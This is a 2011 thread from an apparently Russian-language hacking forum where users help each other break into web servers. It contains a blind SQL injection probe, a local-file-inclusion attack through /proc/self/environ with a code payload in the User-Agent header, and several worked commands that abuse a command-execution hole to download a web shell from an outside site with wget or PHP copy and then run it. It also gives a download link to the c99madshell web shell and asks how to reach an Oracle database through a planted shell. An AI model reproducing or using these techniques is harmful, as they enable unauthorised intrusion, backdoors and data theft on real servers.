 |
|

15.08.2011, 14:09
|
|
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами:
7864886
Репутация:
0
|
|
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4
I don't see difference at this page........can u help me?
|
|
|

15.08.2011, 15:58
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от oODungVTOo
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4
I don't see difference at this page........can u help me?
The second option displaying "Madre e Hijo Nesk". The first option doesn't show anything
|
|
|

15.08.2011, 21:29
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
С нами:
8515014
Репутация:
0
|
|
file=../../../../../proc/self/environ
выводит содержимое файла.
через Tamper записываю
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
пытаюсь подключить,
file=../../../../../proc/self/environ&e=e=phpinfo();
просто выводит водержимое.
Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?
|
|
|

15.08.2011, 21:33
|
|
Новичок
Регистрация: 27.07.2010
Сообщений: 5
С нами:
8312726
Репутация:
-5
|
|
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
|
|
|

15.08.2011, 21:39
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от chaby
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
index.php?cmd=wget http://site.ru/shell.txt -O shell.php
|
|
|

15.08.2011, 21:42
|
|
Новичок
Регистрация: 27.07.2010
Сообщений: 5
С нами:
8312726
Репутация:
-5
|
|
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ
|
|
|

15.08.2011, 21:43
|
|
Познающий
Регистрация: 03.03.2011
Сообщений: 51
С нами:
7997366
Репутация:
0
|
|
Сообщение от chaby
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
посмотри стоит ли wget: index.php?cmd=whereis wget
Если стоит, делай так:
wget http://address/shell.txt -O /path/to/shell/shell.php
з.ы. Папка в которую заливаешь шелл, должна быть открыта на запись. Посмотреть можешь так:
index.php?cmd=ls -la
|
|
|

15.08.2011, 21:53
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Sloneny
file=../../../../../proc/self/environ
выводит содержимое файла.
через Tamper записываю
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
пытаюсь подключить,
file=../../../../../proc/self/environ&e=e=phpinfo();
просто выводит водержимое.
Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?
передай в заголовке User-agent.
Сообщение от chaby
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ
Сделай так:
1. index.php?cmd=phpinfo();
если выведет результат команды phpinfo (ты это увидешь), то выполни такую команду index.php?cmd=copy($_GET,$_GET[o]);&s=ссылка_на_шелл&o=/tmp/sss.php и шелл скопируется в /tmp/sss.php
дальше делаешь: index.php?cmd=include($_GET);&s=/tmp/sss.php
2. index.php?cmd=ls -la
если выведется содержимое текущего каталога, то выполни index.php?cmd=wget -O sss.php ссылка_на_шелл
шел скопируется в текущую диру, и потом просто открой sss.php
Соответственно сработает если хватит прав на запись.
|
|
|

15.08.2011, 22:02
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от chaby
права на запись есть и шщел есть мне его не куда залить чтоб прямую сылку получить
http://madnet.name/files/download/9_c99madshell.php
p.s. Твой вопрос разжеван. Увижу еще один вопрос касающийся этого вопроса от тебя, посты все тру, тебя баню.
|
|
|

15.08.2011, 23:34
|
|
Новичок
Регистрация: 05.08.2011
Сообщений: 14
С нами:
7774166
Репутация:
0
|
|
Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi?
Iz etogo topika nechego rabotyeshego vrode ne nashel /thread246807.html
Spasibo
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|